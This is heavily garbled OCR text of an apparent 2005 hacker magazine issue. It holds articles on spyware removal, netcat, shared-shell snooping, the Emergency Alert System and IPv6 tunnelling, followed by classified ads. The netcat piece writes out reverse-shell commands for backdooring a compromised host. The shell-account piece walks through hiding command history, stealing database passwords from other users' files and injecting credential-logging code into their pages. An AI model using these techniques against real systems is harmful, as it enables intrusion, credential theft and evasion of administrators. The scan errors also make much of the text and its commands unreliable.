MSCONFIG will work under Win 2k. Irecommend CWShredder. After launching, select "Fix" and it
the XP version which i s available at http://down- will search for and remove any CoolWebSearch
loads.thetechguide.corn/msconfig.zip. Ithought programs. CoolWebSearch likes t o change many
I would also add my own process for eradicating Internet Explorer settings, adding their own web-
a l l types of scumware. sites t o trusted sites, changing your search pref-
Are y o u Infected? erences and homepages, and redirecting you t o
First, how do you know i f you are infected their sites whenever you mistype a URL. CW-
with scumware? I f any o f the following sound Shredder should take less than a minute to run.
familiar: Next on the list i s Spybot S&D. Run this nifty
A gangload o f popups, even when not con- little program and it will scan the registry and
nected t o the Internet, files for occurrences of scumware. Select "Search
Internet Explorer toolbars (95 percent are and Destroy" from the menu on the left and then
scan on the screen it brings up. This program will
scumware),
take about 5-10 minutes t o run.
Homepage Hijacking (inability t o change
After that is done, run Adaware SE. For this
homepage),
program select smart system scan. This program
Internet activity from modem when no Inter-
also searches through the registry and folders for
net applications are running,
scumware programs. This scan can take anywhere
Numerous processes running that have seem-
from 10 minutes t o 2 hours.
ingly random names, The final file searching program, SpySweeper,
A process that has "XxX" or "teen" in its name i s one of the best programs available i n my opin-
(quit looking a t so much porn), ion and it would be worth it t o purchase the f u l l
Serious decay in system speed, version. This program does an in-depth scan o f
then more than likely you are infected with a l l files, folders, and registry entries and re-
scumware. What t o do next? Let's get rid of it. All moves from them a l l the leftovers that the previ-
of it. ous programs didn't catch. From the main menu
Removal select "Sweep Now" and then "Start." After the
The following instructions are for users of a l l scan is complete you will be prompted for which
versions of Windows. First you have t o download, files you want t o be quarantined. This scan i s
install, and update these programs. It is ex- similar t o Adaware and can take anywhere from
tremely important for you t o manually update 20 minutes t o 4 hours.
these programs because some of them do not Finally, run HijackThis a t the menu select
have the latest definitions when you download Scan and it will display a complete list of BHOs,
them. Internet Explorer Toolbars, Startup items, and
CWShredder http://www.majorgeeks.com/down extra buttons added t o Internet Explorer. Be sure
wload4086. html you understand what each entry i s before you
Spybot S&D http://www.safer-networking.org/ remove it! You may want t o keep many of these
w en/download/index. html entries.
/ your computer. Be sure t o read t h e documental
Kazaa
Did you ever have Kazaa installed on your tion because it won't work with Win XP or Win 2k
computer? I f so, go t o http://www.spychecker sr2.
-.com/program/kazaagone.html and download Summary
KazaaBegone t o eliminate a l l traces of Kazaa Your computer should now r u n much faster
along with the bundled software that came with since you freed up a l o t o f processing power from
it. processes that were absolutely worthless. At this
I n t e r n e t Explorer point Iusually remove a l l t h e applications except
Sick of Internet Explorer? Can't figure out how Spysweeper and always let it r u n i n t h e back-
t o completely remove it from your system? Down- ground t o notify you of any changes t h a t are
load IEeradicator from http://www.litepc.com/ made t o your Internet Explorer f i l e s and startup
-ieradicator.html t o completely remove it from files.

by DJ Williams ning i n very verbose mode, followed by t h e tar-


The following article is a continuation t o Mo- get, which can be a domain or IP, a n d t h e default
biusRenoire1s original submission i n 21:2 "Fun web server port (80). Once netcat connects, you
With Netcat." Netcat (nc), created by Hobbit, is must type i n an H l l P directive such as:
known as the "Swiss army knife" of security/hack- HEAD / HTTP/I. o
ing tools. This is most likely due t o the tool's ex- <en terz
tensive features and capabilities. Before we <en t e n
explore some additional uses o f netcat, you are The reply should indicate w h a t type o f web
advised t o get written permission before execut- server i s running. You can substitute t h e HEAD di-
ing any o f these examples on systems you do not rective for the OPTIONS directive t o Learn more
own. Sure, you may be saying "screw that" yet about the web server. An example o f t h e output is
even on work systems, employees have been fired listed below.
for running tools without permission. nc -w 10.10.10.1 80
As described i n the 21:2 article, netcat used www.example.com [10.10.10.1] 80 (http)
with basic options nc [host] [port] allows -open
TCP/UDP (-u) connections on a selected port t o HEAD / HTTP/I.O
perform a variety o f tasks. The focus of this arti-
cle i s t o explore additional uses, so let's take a .
HTTP/l 1 302 Found
look a t some more examples. Date: Sun, 22 Aug 2004 18:09:21 GMT
Web Server (banner) Discovery Server: Stronghold/2.4.2 Apache/l.3.6
Most web servers are configured by default t o *CZNetEU/2412 (Unix) mod-fastcgi/2.2. 12
reveal the type and version, which may be helpful Location: http://www.example.com/index.
t o an attacker. Wait ... Iknow some o f you are
saying Ichanged my banners t o obfuscate the Connection: close
web server (i.e., RemoveServerHeader feature i n Content-Type: text/html; charset=iso-
the URLScan security t o o l t o mask IIS web -8859-1
servers). The point here i s that someone could
have changed the banner and you may want t o Port Scanning
validate the output with an alternate t o o l such as As a fast alternative t o Fydor's nrnap (www.in
net-square's HllPrint (www.net-square.com/ -secure.org/nmap/), the king o f p o r t scanners,
*httprint/). With that said, let's look how web netcat can be used. I s this t h e best choice? Iam
server discovery can be accomplished. First we sure it is not, yet the purpose o f t h i s article is t o
need t o establish a connection t o the target web demonstrate netcat's abilities. Let's take a look
server on the default H l l P port. a t t h e syntax t o use netcat as a p o r t scanner.
nc -vv target 80 nc -v -r -w3 -2 target portl-portn
, The -w option indicates that netcat i s run- The -v option indicates t h a t netcat i s running
\Spring 2005 P a g e 5x 1
verbose mode, the -r is t o randomly select mised system. Two examples are listed below. \
ports from provided list, the -w i s the wait time i n Target Machine
seconds, and the -z option prevents sending data ,C -e path-to-program [host] [port]
t o the TCP connection. The target can be a do- The -e i s the program t o execute once a con-
main or I P and the port list follows (use a space nection i s established.
t o separate). An example of a TCP port scan (on a ~ h , following isa *nix sty{e:
'nix sewer) is listed below. Note: for UDP add the nc -, /bin/sh 0. 69 2112
-u option and associated ports. The following i s a Windows style:
nc -v -2 -r -w3 10.96.0.242 20-21 23 80-
nc.exe -e cmd.exe 10.10.10.69 2112
b445 /sort -k 3b
Attack Machine
www.example.com [10.96.0.242] 21 open
nc -vv -1 -p port
www.example.com [10.96.0.242] 23 open
The -w option indicates t h a t netcat i s run-
www.example.com [10.96.0.242] 80 open
www.example.com [10.96.0.2421 443 open
ning i n very verbose mode; -1 listen mode for in-
FTP coming connections; -p port number.
Yes, you read it right, netcat can be used as a Start a listener, pick a port allowed through
crude FTP tool. First you will need netcat in- t h e firewall:
stalled on both machines. I tested both a binary nc -vv -1 -P 2112
and text transfer. They both worked fine. Note: listenins on [any1 2112 - ..
for best results, make sure the sender has a small connect to [10.10.l0.691 from www.exam
delay (-w); the receiver does not require a delay. bple.com [lo.10.10.691 548
Go ahead and t r y it out! An example of the out- M ~ C I - O S OWindows
~~ 2000 [Version 5.00.21951
put i s listed below. (c) Copyright 1985-2000 Microsoft corp.
Sender
nc -w3 host port c file C:\inetpub\scriptsz
The -w wait time i n seconds; host/IP of re-
ceiver; < redirect file i n Note, you may need t o h i t enter a few times ...
nc -w3 127.0.0.1 2112 < help.txt and bang, you have a shell prompt on the remote
nc -w3 127.0.0.1 2112 < Sample.jpy system.
Receiver Final Words
nc -1 -p port > file
I n closing, we have seen the power of the net-
The -llisten mode for incoming connections; - cat tool. You are encouraged t o test i t s abilities
p port number; > rediredto file
nc -1 -p 2112 > help.txt
on your local system (127.0.0.1) as it will work.
nc -1 -p 2112 7 Sample.jpg For more information, check out the following
Shovel the Shell links:
To wrap up, I have included the most interest- htt~://www.zoran.net/~m-resourc~s/ne~
ing use of netcat, i n my humble opinion. Here we 'cat-hobbit-as~ (used as a reference)
will be using netcat t o shovel the shell (command htt~://www.securityfocus.com/tools/137
prompt) from one machine t o another. This has ,(download site)
been used and most likely is i n use right now, Shout Outs: REL, DM, JM, KW, SW, and PF (the
where one can acquire a backdoor into a compro- band).

The VCDs f r o m

a r e now available
They consist of all of the talks which took place i n the two main tracks of the conference,
which occurred i n July 2004. There are 78 discs i n total! We can't possibly fit all of the
titles here but we can tell you that you can get them for $5 each or $200 for the lot. Much
more info can be found on our website (www.2600.com) where you can also download all
of the audio from the conference. I f you want to buy any of the VCDs, you can send a
check or money order to 2600, PO Box 752, Middle Island, NY 11953 USA or buy them
credit card a t store.2600.com.
2600 Magazine 1
by st4r-runner for storing sensitive information i n those directo-
Having a shell account on a shared system is ries. They think t h a t j u s t because t h e y don't pro-
convenient, fun, and dangerous. A l o t of web- vide a link for t h a t file or directory on their little
hosting services provide shell access and some web page means that no can get t o it. Users will
ISPs offer shell accounts on their Linux/Unix put things like "bank-info.xls" o r "pic-of-wife-no-
boxes. I f you're Lucky enough t o have one you one-should-see.jpgM or "myfavband.mp3". What
should be aware of the potential for information else could we do? Let's see. Ah, t h e user i s run-
leakage and protect yourself on these systems. ning PHP-Nuke or some other php/mysql based
Let's demonstrate how t o harvest some info. portal and they have a nice config-php file.
First, prepare your environment t o avoid leaving 1s -1 /home/usernme/www/*.php
a telltale trail: You'd be surprised a t how many users make
rm -/.bash-history their database password the same as their login
then password t o t h a t system.
In -s /dev/null -/.bash-history vi /home/username/www/contig.php
I f it's not a bash shell then do the same for ...
Hmm dbuname=username a n d dbpass=my-
the .sh-history or whatever t h e case may be. secretpw. OK. So now Iown their database. But I
Now let's see what we have for user directories: wonder if they would be dumb enough t o have
Is -a1 /home that same password for this system.
You'll probably get permission denied. No ssh -1 username localhost
problem: Just do it from localhost, not y o u r home sys-
cat /etc/passwd tem (if the user or sysadmin runs t h e "last" com-
should show you a l l the user directories any- mand it will reveal your I P address). I f t h e login
way. What's i n their directories? Hopefully i s unsuccessful, don't worry. There may be more
Is -a1 /home/username t o look a t still.
won't work (but you never know). So where How about writable files and directories?
can you go from there? See if perhaps their .bash find /home/username/www -perm 0777 -print
files are readable. find /home/username/www -perm 0666 -print
Is -1 /home/username/.bash-history Play around with permission modes. 6 or 7 i n
Is -1 /home/username/.bashgrofile the last position i s what you're looking for. I f a
Is -1 /home/username/.bashrc user has a writable directory t h e n you can put
Are any o f those readable (rw-r--r--)? Take a your own files i n there. I f a user has a writable
look at them. They may show some interesting in- file like a php then you can put your own spyware
formation. Now here's where it can get interest- i n t o the code t o let you know when users access
ing. Most shell servers will have a web server the page or if it has a login form y o u can write
available for sharing out a personal web page. code i n there t o write the user name and pass-
This directory w i l l likely be "/PublicHtml (you word t o a file for you t o collect later on. What-
should have the same directory). But if you want ever.
t o be sure then Now be careful o f what you do. You are not al-
grep UserDir httpd.conf lowed t o violate someone's privacy or destroy
httpd.conf can be located i n different places their content. Some linux administrators have
depending on the installation. Some common Lo- gotten smart and used grsecurity's patches t o log
cations are /etc/httpd, /etc/apache, /usr/ a l l exec's from users so they can be alerted if
-local/apache/conf, or/var/www/conf or do. some user i s running "find / -perm 0777". You
ps ax / grep httpd w i l l get caught. So make sure t h a t y o u stay under
and it might show you t h e f u l l command line t h e radar. Find out if t h e system i s a grsecurity
(/usr/sbin/httpd -f /etc/httpd/httpd.conf). Once kernel.
you know the UserDir, guess what? That directory uname -a
is world readable. Big deal, right? Well take the Well, have fun poking around b u t don't do
,
time t o poke a little further. Users are notorious anything stupid.
/
* Inside the

Emeroency
la Alert System
by Tokachu transmission, preserved i n eight b i t format:
->*<**,*..*.?.,-
The Emergency Alert System, commonly called ZCZC-WXR-HUW-03 71 83i0300
EAS, originates from the FCC-mandated Emer- b-0661830-WXYZ/FM -
gency Broadcast System (formerly known as The sixteen funny symbols a t t h e beginning i s
Conelrad), which was nothing more than a Long the 16 byte header, along with another four byte
multifrequency tone generator and detector. Be- header of "ZCZC" t o indicate ASCII data. "WXR" i s
fore the Kennedy Administration, such signals the notifying party (the National Weather Ser-
were only accessible for major networks and by vice, for this example). "HUW" i s t h e message
the early 1990s the system was showing i t s age. code ("Hurricane Warning"), and "037183" i s the
Some cable companies resorted t o building their affected area, noted i n undashed FIPS 6-4 for-
own unique alert systems using old phone equip- mat. The first digit i s the region, which i s usually
ment because the 30 year old system was, quite set t o "Nationwide" (0) and ignored; t h e second
literally, falling apart. I n 1994, after three years and third digits note the state (North Carolina),
of research and development, the FCC introduced and the last three digits are t h e county number
what is now the modern EAS, and i n 1997 the (Wake County). To store more t h a n one Location,
system was made mandatory. the format might look like "######-
Network topology ######+", with each "######-" being a six
The original EBS worked i n a daisy-chain fash- digit location code and with t h e l a s t code ending
ion, where the authorities would notify one radio with a plus rather than a minus symbol. The four
station, that radio station would notify another digits after the plus symbol represent t h e length
station, and so forth. The EAS works i n a hierar- of time the alert i s effective for (exactly three
chical manner, where the notifying party (civil hours i n this example). For the n e x t seven digits,
authorities, the National Weather Service, or Law the first three are a Julian-formatted date ("066"
enforcement) notify the largest station i n the means the 66th day of t h e year, o r May 7th i n
area. From there, other smaller radio stations ac- 2005). The last four digits are t h e starting time
tually have a receiver hooked up t o the EAS en- (6:30 pm). The next eight characters hold t h e call
coder/decoder (the "endec") that listens for the sign o f the radio station sending o u t t h e alert. It
big radio station, and the endec will cut i n t o the i s space-padded at the end, and any dashes i n
radio station's signal t o transmit at least three t h e call sign are replaced with slashes. The mes-
bursts of data along with the attention signal. sage ends with a single dash.
Data Format What i s n o t shown here i s t h e two-tone signal
I'll be brief i n the data format: it's FSK-en- o f 853 Hz and 960 Hz, which must be emitted for
coded (one tone is a mark, or "1" i n binary, and a t least eight seconds after t h e data i s sent at
another tone i s a space, or "OM), which limits i t s
transmission speed t o about 1200 bps. However,
,least
, * , ,,three
<
times. From there, data with
,,,,,,,,,,,
NNNN" transmitted exactly
it operates at a very strange baud: 520.83 bps, or three times acts as the signal for t h e end of the
one b i t every 1.92 milliseconds. The space fre- transmission. For some really detailed informa-
quency is the bitrate multiplied by three (exactly tion, you should read document FCC 47 CFR 11,
1562.5 Hz),,and the mark frequency is the bitrate available on (http://fcc.gov).
multiplied by four (approximately 2083.3 Hz). Security
Each byte is a regular eight b i t byte containing I'm sure you're thinking something along the
ASCII data (the most significant byte is ignored lines o f "if there's nothing t o authenticate or en-
when receiving the data format), so it's very easy crypt the information, what's keeping people
t o modulate data. from breaking i n t o machines a n d sending fake
The header consists o f 16 bytes with binary signals?" Well, there's a few t h i n g s you should
value "10101011". As the bitrate and transmis- know. First, most radio stations have a live per-
sion protocols are constant, there i s no need son t o confirm whether or n o t t o forward any
t o transmit bitrate calibration signals or message received. Second, these machines are
,
mark/space information. Here i s a sample not hooked up like computers; they're placed
h o n g i d e transmission equipment, and are not
hooked up t o any network or external computer
(with the exception of video crawls i n television
stations, but those still require manual interven-
station i n that area. This kind o f message would
not result i n another "War of the Worlds" sce-
'I
nario, but would still result i n loss o f revenue by
the television stations. Then again, a test only ,
tion t o function). Ican t e l l you that every time I lasts a few minutes and unless the attacker struck
hear that little "duck quack," Ido flip out, but during the Super Bowl commercial break, the
even though Ihave a Legal obligation t o forward losses would be negligible. I'll keep the door
the message, Ican call the radio station after- locked, just i n case you get any ideas.
wards t o confirm it (and if it's fake, Ican break Conclusion
back into the radio circuit t o let people know). While it is very easy t o make a signal genera-
But let's say you happen t o get i n t o the radio tor for the EAS, there i s no real use for it beyond
station and get physical access t o the machine t h e transmitter. I f you're daring, you could mod-
(which you won't) or happen t o somehow break ify a radio packet program t o use the frequencies
into the remote transmission facilities t o inter- and bitrate of the EAS t o automatically log emer-
rupt the audio and use your own EAS endec gencies. Radio Shack used t o sell a radio scanner
(which you probably won't). The FCC can find you t h a t could tune i n t o FM stations and TV audio
easily because you'd have t o be very close or in- carriers and decode EAS signals for about 870
side the radio station t o pull such a task off. You some time ago, although it might be a b i t more
would then be prosecuted and your message expensive nowadays.
might not even be forwarded! The only vulnera- Nonetheless, until the EAS i s completely inte-
1 bility Ican find is the f a d that the FCC mandates grated into consumer appliances such as cellular
1 that there be either a weekly or monthly test of phones, there is nothing t o worry about when it
I the EAS endec. Unfortunately, that means that a comes t o "breaking into" the system, and with
rogue attacker could very likely be able t o inject a the FCC collecting comments on the next genera-
test signal into a cable television network, which tion o f the EAS, it w i l l probably be very stable
would not only interrupt one station, but every and very secure i n the days t o come.

I P - V , L Redux
by Gr@ve-Rose probably stop reading here! For the rest of us, we
Hello everyone. Since my last article touched need t o establish an IPv6 tunnel with a tunnel
upon an introduction t o the IPv6 protocol, I broker. Tunnel broker's are organizations that will
thought a nice follow-up article on how t o con- allocate you a network from their subnet that you
figure your network would be beneficial and can use. Some of the ones out there include Hur-
some fun practice. Without further adieu, let's ricane Electric (http://ipv6tb.he.net) and
get down t o business. Hexago (http://www.hexago.com) as well as
My Network many others. I have used both o f the aforemen-
As a point of reference, here is a (very) basic tioned but will focus on Hexago as I have had
overview of my network at home. Frankenserver i s
good service with them.
my Linux gateway, server, and basic a l l-in-one
'
Swing over t o the Hexago site and, at the top
box running Red Hat EL3 and Checkpoint FW-1
NGFP4 R55 connected t o a 3Mb PPPoE connec- right of the page, select the "Get IPv6 i n 3 steps"
tion. My main desktop PC i s Alice and she runs link. Go through the short registration process
Mandrake 10.0 (2.6.3-7mdk vanilla). I have and get t h e Linux TSP client a t t h e end. Save the
about five or six more computers but will only be TSP client on your border router (Frank for me)
focusing on Frank and Alice. and uncompress it. Install it with the command:
Tunnel Broker "make target=linux installdir=/usr/local/tspc i n
I'm assuming that your current ISP does not ,stall" which will install the program i n /usr/
offer native IPv6 connections. I f it does, you can ,local/tspc.
' Once you have installed t h e TSP client, switch for different ports which may b e used i n the
\
to /usr/local/tspc/bin and edit t h e tspc.conf file. 6over4 tunnel. Because o f this, I performed a se-
Here are the main things you will need t o have: curity audit on Frank t o ensure t h a t t h e only ser-
tsp-dir=/usr/local/tspc Location of the program vices Listening are t h e ones I want t o have
auth-method=any Choose the best for us running. (This i s good practice anyway.) Right
client-vd=auto Interface to peer with (external)
now, only HTTP(S) and SSH are Listening on IPv6.
userid= - Username
Second, although Checkpoint does support
passwd= - Password
IPv6, it currently struggles with s t a t e f u l inspec-
template=linux - Using Linux, right?
server=broker.freenet6.net -Used for logging in
tion o f tunneled traffic for IPv4 and IPv6. This
retry_delay=30 - 30 second retries means t h a t anyone can access any o f t h e global-
tunnel_mode=v6anyv4 - Leave this as it is unicast I P addresses I've been assigned. I n lay-
if-tunnel-v6vd=sitl - Leave this as it is man's terms, Alice's IPv6 i s unprotected. A quick
if-tunnel_v6udpv4=tun - Leave this as it is "netstat -na I grep \:\:" revealed only SSH lis
proxy-client=no -
We are not a proxy server wtening on :::22. Hacking /etc/ssh/sshd-config
keepalive=yes - Always a good idea and changing the Listenports t o ::1 and
keepalive-interval=30 - 30 second keepalive 172.17.2.2, followed by a "service sshd restartH
host-type=router - We are a router worked properly. Now the only service on Alice
prefixlen=48 - Obtain a 148 subnet Listening on IPv6 i s SSH Listening on t h e loop-
if-prefix=ethO - Internal network card
back interface only.
Once you have configured this, save the file Lastly, Icreated my IPv6 objects within t h e
and run the command: "./tspc -f ./tspc.conf -wv"
SmartDashboard of Checkpoint ([6]-Alice-v6
and you should see the transaction take place.
Any error messages you see if it fails are most --host-node, [6]-Frank-ethO-host-node, [6]-
likely i n the Hexago FAQ pages. Check there for Frank-sitl-host-node and [= 1 -]-Internal-
more help. Run an "ifconfig -a" and you should -v6-network) and allowed my Internal-v6-net
now see your sit1 interface with a 1128 subnet -work out without limitation.
(our tunneling mechanism) and ethO should now Testing
have a global-unicast I P address starting with If everything has gone correctly, you should
2001: with a /48 subnet. be able t o ping6 sites. Try "ping6 www.kame.net"
Client Configuration which should return from orange.kame.net. I f
Head on over t o your desktop PC (Alice, i n my DNS, doesn't work, their I P address is:
case) and, if you're running a kernel pre-2.6, run 2001:200:0:8002:203:47ff:fea5:3085.
"insmod ipv6" t o install the IPv6 module. Wait for How about websites? The best o n e t o test with
a few moments and then run an "ifconfig -a" and i s http://www.ipv6.bieringer.de/ because you
your ethernet adapter should now have its own
can onlyaccess it from an IPv6-enabled machine.
global-unicast (2001:) I P address. How did this
IPv4 browsing w i l l return a Bad Gateway error
happen? Well, the TSP client also works as
radv(d) which will advertise I P addresses for con- message.
figuration. Cool, eh? What's really interesting t o see are t h e actual
Now, let's add DNS resolution. Technically, packets going back and forth. Isuggest using
any DNS server can give you an A6 record (dig -t Ethereal but even tcpdump w i l l show you t h e IPv4
AAAA servername.com) but we want t o make sure addresses followed by the (un)encapsulated IPv6
of this. Open /etc/resolv.conf and add the follow- addresses. Fun stuff!
ing t o the top: Conclusion
options inet6 I hope t h a t this article has helped you on
nameserver ,2001:238: r l your way t o learning more about I P v 6 as well as
Yes, that is a valid IPv6 nameserver (at the how itfunctions. Ihave some documents floating
time of this writing). Once this i s done, we should around on the web about IPv6 so if you can track
move on t o the security portion .... them down, they should help y o u out as well.
Security Considerations
Take a look at different websites o u t there and,
This is where things get tricky. I'm running
Checkpoint Firewall-1 and, although it does sup- bundled with t h e inquisitive nature I ' m sure you
port IPv6, not a l l features are available yet. As possess, you'll be flying v6-style i n n o time!
such, Ihave had t o make some modifications t o Shouts: ChlxOr, phoneboy, B o b Hinden,
both Alice and Frank. David Kessens, TAC-Kanata, elligirf, anyone I may
First off, Ihad t o allow the Hexago IPv4 have missed, and o f course, eXoDuS (YNBAB-
server t o access Frank's IPv4 unrestricted t o allow WARL)!
Page 57'
I Happenings 1 1 oltr,?
~ I I ~ I ~ I>p<,,>k~~
~ ~ I LItleal
~IC frm'i 1 < r t ~ ~ l d ,A~ l! z~ t, ~ c ~
doqr/rhlmpr. rignlflrant others. hackers. and computer wlisrds. blvp one to a
bay/g>rlfi~endor to that poten6al"iomeone"you meet at a party, the supermar-
~~ ~! # I~! , ,cIh\1
VIC ~

SUMMERCON 2005 PRESENTS: TOOLS OFTHE TRADE. Come one, comeall! ket, school, or the mall: with your pre-programmed telephone number, he/rhe will
Hackers, phreakers, phrackers, feds. 2600 shock troops, cops. "security profession- always be able to call you! Also, ideal i f you don't want to "disclose" your tele-
als.' U4EA. rOOt kids club, orerr, arouoier. conference whores. kOd3rr. convicted phone number but want someone to be able to call you locally or long distance by

II 'eon%. concerneo parcnrr. an0 teachpi5. Iiackrrr an0 oeer col Ioe far tne lecnno-
cd fpre'nnt rne propnets narneo yo. aoodr. J.neL-6 n A-st n Tekar. Omnl
A L I ~ no'el Onrnrann. 100 San Jaolrro at Rtn i l r e ~ t Atown.

Pre-reaiiter now!
. TX 78701 For mare
~nformahan,t-shirts, registration, and much more: http://www.summercon.org
telephone. Key ring/cbp. Limited quantity available. Money order only. $24.95 +
$3.00 SIH. Mail order to: PHONE HOME, Nimrod Division. 331 N. New Ballar Road.
Box ~10RO2CRC M8ssOdn 631-1
LEARN LOCK PICKING I t r EASYrvlrh our nook an0 nevr vloca The 2na edltlan
boa. aeor otr mare Intcre5nnq matenal an0 11I t r r a t ~ o n*h# ~ P tne ndeo 8s f l l eo

I CAROUNACON 2005. h n e 10-12 at the Ra eiqn AmeriS~irerhotel. A d m ~ ~ r i a n


SI5. Confc~mcerate for t h na.eI
welcome.
~ room5 aial aole at rara.lnacon arg. Speaxerr
with computer graphic cutawayviews. Learn what they don't want you to know.
Any security system can be beaten, many timer right through the front door. Learn
the secrets and weakness of today's locks. I f you want to get where you are not
WHAT THE HACK! Timer have changed: Terrorism, metal detectors, special new supposed to be, thir book could be your anrwer. Explore the empowering world of
laws, and our leaders getting ever closer to their dream of "knowing it all." It's lock . aickino.. Send twentv bucks for the book or video to Standard Publications. PO
been a cram almost four vears since the last hme all the tribes of the hacker uni- Box 2?76hO. Champalgr I.6i825 or mrlr .I at muw.rranaa.opLh Iranan5 ram/
vFrlP cdmpeo 0-1 ~nTnp heIner anor at hA.2001. nlqn n ? e t o qe'togrlner, meet.
-dvect ?hOO nrrrl fa yo,, 2600reaorr pnce axco .nr
r e f ~ m 1ho6
. 0.r prolec$, nrlo alsc .r$ our loerr ho matt?, rherner )o. re into
FlLE TRACKING SOFWARE: FI eAcra.ntan:(TM) Wlnoour XPana ater Crearer a
figuring autwhat they're up to, doing something about it, or having a good time
Irt of fVer an yo., naro crl,e. R.8" 11brl0.e and afre. lnrla Ibng ne* prooucr
with some of the smartest and funniest people we know of, come to What The
ano/o dpoarer to ol<car*r r n x n f ler areanoPo mange0 oe nco. Prnr ti$.r.
Hack, July 28-31, near Den Borch. The Netherlands. For more informahon, visit
Mher features. Mare information at:
http://whatthehack.org.
hap://abi~tybusines~~ompute~~eNice~.~om/fa.html or fa.info@abilityburinerr
INTERZONE GOES WEST! While the Atlanta Interfine stays hacker can,
InterzoneWest will be a more professional style LT. conference, carrying on i n the ~computerrelvicer.com.
tradition of "effecting change through education." Along with InterzoneWest, SIZE ODES MATIER! TheTwin Towers may be gone forever but a detailed image
-
GRAYAREA the nan- traditional recuritv.academv -
.- w i l l be haooenino.
.. teachina still ekisb of the massive 374-foot radio tower that war perched atop One World

I methodologies and rkillr instead of test answers! San Frannsco Bay Area In early Trade Center. Thir high-quality glorry color poster i r available i n two riles (16" x
October 2005. See inten0ne.com or grayarea.info for the latest detalls. 20" and 20" x 30") and maker a spectacular gift for engineers, scientists, radio and
television buffs, or anybody who appreciates a unique, rarely seen view of the

1 -
SPAMSHIRT.COM take same roam . and out, it on a t-shirt. Now available i n the
World Trade Center. Visit www.wtc-p0ster.u~ for samples and to order your own
porter.
CABLE N DESCRAMBLERS. New. (2) 199 + $5.00 shipping. money orderjcarh

II US.! www.rpamshirt.com. only. Works on analog or analog/digital cable systems. Premium channels and pos-
CHECK OUT JEAH.NETfor reliable and affordable Unix shells. Beginners and ad- riblv PPV deoendina on rvrtem. Comolete with IlOvac Dower ruoalv. Purchaser ar-
vanced urerr love JEAH's Unix shells for performancedriven uptimer and a huqe rum& role iesponr;biliGfor notifyin'g cable operator df use of der;rambler.
list of Virtual Horts. Your account lets you store data, use IRC. SSH, and e m a i l k t h Requires a cableTV converter (1.e.. Rad~oShack) to be used with the unit. Cable
camolete anvacv,and- recuntv. JEAH also offers fast and stable hortino for voui>
connects to the converter, then the dercrambler. then the output goes t o TV set

II
4~

web rlte, plus theability to register and manage your own domain name. All at tuned t o channel 3. CO 9621 Olive, Box 28992-TS, Olivettet Sur, M?rrauri63132.
very"compehtive
' prices. Special for 2600 subscribers: Mention 2600and receive Email: cabledescrambIerguy@yahoo.com.
setup fees waived. Look to www.jeah.net for the exceptional service and attention DECEPTION. The Pine Lake Media Group is pleased to present t o you our debut re-

I g E F d : h DOWNli'Mf ON DVD! Years i n the makina but we hone it was worth the
.
leare. Decelrtion, bv. award-winnino newsmax.cam columnirt Charles Smith. Manv
citizens think they know what their government is doing i n their names. After

I
I
I
&a#- A co.0.r OvD IP~ t l a t lntIJOe5 the two no., oocdmsntary, an in-depth tnrer.
w e w m,n < e m Murlrr. an0 nra.0 :hree hour$ of extra scener. or1 faorage. and
ml,ceI nnml.5 st .ff P *.I capnonlng for 20 (1b111 nor-I. 20) lanq~aqes,<o.nnwn-
tar" track, and a lot of thinqs you'll iust have to find far vourrelf! The entire two
dis; set can be had bv * rendhd$30
. to Freedom O o w n t i m e " ~ ~PO
~ .Box 752. Middle
reading Deception, you'll see just how bad it really is and how little you really
know. Deception is the true story of the greatest Chinere Army espionage opera-
tional exoloit aaainrt the United Stater. Based on a decade of research and more
than 50.000 paqer of offloa. an0 r.a$?#f#ea ooc.rrentr onratneo urwg rne Free-
do- Of Informarlon An, no o r n v o o c ~p->llrn~cto .a+? even <omparer to llerep-
I Island NY 11953 IlSAar - buardetino
-, from our online stare at tion. While many books have "gone after" presidents before, Deceptionis unique
http://store.2600.com. (VHS copier of the film rhllavailable for $15.) because we've included all of the evidence backino* uo , our charoer. We have the
< - ~
NETWORKINGAND SECURIPI PRODUCTS available at OvationTerhnology.com. signed letter from Motorola CEO Gary Tooter thanking Ron Brawn, farmer United
1 We're a Network Securitv and Internet Privacy conrultinq firm and supplier of oet- States Commerce Department Secretary, for the presidential waiver allowing the
working hardware. Our online stare f e a t u r e r ~and ~ ~firewall hardware, wirelelr exoort of encrvpted police radios to China. And nearlv 100 other unmodified. un-
hardware, cable and DSL modems/routers, IP access devices. VoIP products. emoel >rheaoocimenl< Ihat nnmp "amp<. Orner your cop) tooay f o r ac0,no.a in.
parental control products, and ethernet switches. We pride ourselver an prwiding forwarlon a*o to ororr, p ra5Qn v t o.r ~ e b r l r at
r . m a pme aeemeola con or ca I
the highest level of technical expertise and customer ratisfactton. Our commitment ROO-799-4570 or (61s) 275-OR3O. P ea5e note tnat re cannot accept oraerr oy
to you ... No surprises! Easy returns! Buy with confidence! After all, Security and
Privacyis our burinerr! Virit us at http://www.0vationTechnology.com/store.htm.
teteohane at this time. Credit card orders ma" be faxed to 800-799-4571 or (514) ,.
27510829. We accept all major credit cards, checkr, money orders, Liberty Dollars.
ONUNE SERVICES. Web hostina. , cheao . domains, areat dedicated sewers. SSL electronic checks, and good old fashioned cash. We ship worldwide by DHL or

II rertr, an0 a 51 r o r c Lnccx odr w*.hoQ4 com


HACKER LOGO T-SHIRTS AND STICKERS. lnorc ' ~ the r rnow' recognize Thp
G 8oer as tne new kacrer -090. T-qrlr.. anfl 5r#r*er$rm?lazoned m l h tne nac*e#
Logo can be found at HackerLogo.com. Our products are tap quality, and will visu-
all" associate vou as a member of the hacker culture. A oartion of the oroceedr oo
USPS.
CAP'N CRUNCH WHISTLES. Brand new. onlv a few left. THE ORIGINAL WHISTLE i n
mint condition, never used. Join the elite few who own thir treasure! Once they
are gone, that is it - there are no more! Keyrhain hole for keytinq. Identify yourself
at meetings. etc. ar a 2600 member by dangling your keycham and saying nothing.

I ro ruppor tne E wfranlc Frontier Foundanon l l r l t ur a' ~vwwHacrerloqo con


PHRAlkE. I r e ret-nno og) 6 r r n n ~ the
t !#n#\eq.arrer *a-.C we to t r a m tne Cover one hole and get exactly 2600 hz, cover the other hole and get another fre-
quency. Use both holes to call your dog or dolphin. Also, ideal for telephone re-

I
2600 readers who have also become new rubrctibers and encourager those who
have not ACK their need for diverre computer information i n conjundon with that mote control devices. Price includes mailing. $99.95. Not only a collector's item
of 2600 to ded~catesome oackets and become a ~ ~ b s c t i btodav! er V ~ l us
t at our but a VERY USEFUL device to carrv at all timer. Carh or monev order 0°C.Mail to:
new domain www.pearlyfr~eprerr.com/phraine. c
NrllS1.E. PO. Rax 11567-ST. 1. qirrarn 63105.
